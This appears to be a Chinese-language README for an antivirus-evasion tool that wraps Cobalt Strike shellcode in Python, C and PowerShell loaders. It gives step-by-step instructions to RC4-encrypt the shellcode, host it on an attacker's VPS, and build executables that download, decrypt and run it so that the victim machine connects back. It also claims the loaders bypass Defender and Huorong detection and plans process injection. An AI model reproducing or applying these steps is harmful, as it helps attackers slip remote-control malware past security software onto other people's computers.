CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常
V1.0: 目前测试可以过Defender/火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试
下一步开发计划:
V1.5: 加入C版本CS免杀
V1.7:加入Powershell的免杀
V2.0: 开发出UI界面
V3.0: 想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样)
python:
- python2
- pyinstaller
- requests
C: VS2019默认就够了
Powershell: Win10上测试没有问题,也就是ps5.1,更低版本未测试
git clone https://github.com/Gality369/CS-Avoid-killing.git
-
先通过CS生成C格式的shellcode:
Attacks -> packages -> Payload Generator
选择一个listener然后生成一个C的shellcode(其实就是二进制代码) -
Python版:
- 将生成的shellcode填入generator.py的shellcode变量中,填入一个Key,用于后续的RC4加密
- 运行generator.py,生成的payload自动保存在payload.txt中.
- 将payload.txt上传到你的VPS中,后续生成的加载器会从VPS中获取加密shellcode并在本地解密后执行
- 将在VPS上的payload路径填入PyLoader.py的url变量中,填入你刚刚设置的Key
- 用
python pyinstaller.py -F -w PyLoader.py
打包文件,可执行文件在pyshellcode文件夹下的dist中,双击运行可以看到主机上线
-
C版本:
- 按要求填入你自己的Key,shellcdoe长度和shellcode,执行
- 将第一行的数字复制进Loader的Base64ShellLen字段中,将第二行生成的加密shellcode保存在payload.txt文件中并将其放在服务器上(如果不叫这名或者不在跟路径,需要自己改
char request[1024] = "GET /RC4Payload32.txt HTTP/1.1\r\nHost:";
中的路径) - 在Loader中填入自己的Key和VPS的IP,编译
- 执行编译出的exe,CS上线
-
Powershell版本:
- 在CS中生成Powershell版本的payload.ps1
- Python3 PSconfusion.py payload.ps1 AVpayload.ps1
- 经测试能过目前所有杀软的静杀,动杀的话,由于CS中有些模块不免杀,所以加载这些模块时可能会触发动杀,这个以后再研究怎么绕过
-
pyinstaller安装细节
最后一个支持python2的版本是3.6(最新版pyinstall不再支持python2)
网址:https://github.com/pyinstaller/pyinstaller/releases
需要安装pywin32:https://github.com/mhammond/pywin32
-
目标是什么环境就在什么环境上打包,否则可能会出现无法上线的情况,不推荐使用py3对项目进行改造,ctypes对py3的支持不太好,会有些莫名其妙的bug
-
经过测试,C版本在X86Debug模式编译下无任何问题,Release模式下会存在莫名bug,在某些电脑上无法正常上线,请根据需求自行测试
-
编译选项不要选择动态编译,否则可能会因为目标靶机上缺少相应dll而无法运行.
-
加载ps脚本的方式这里不做讨论,有师傅已经总结的非常好了,请自行百度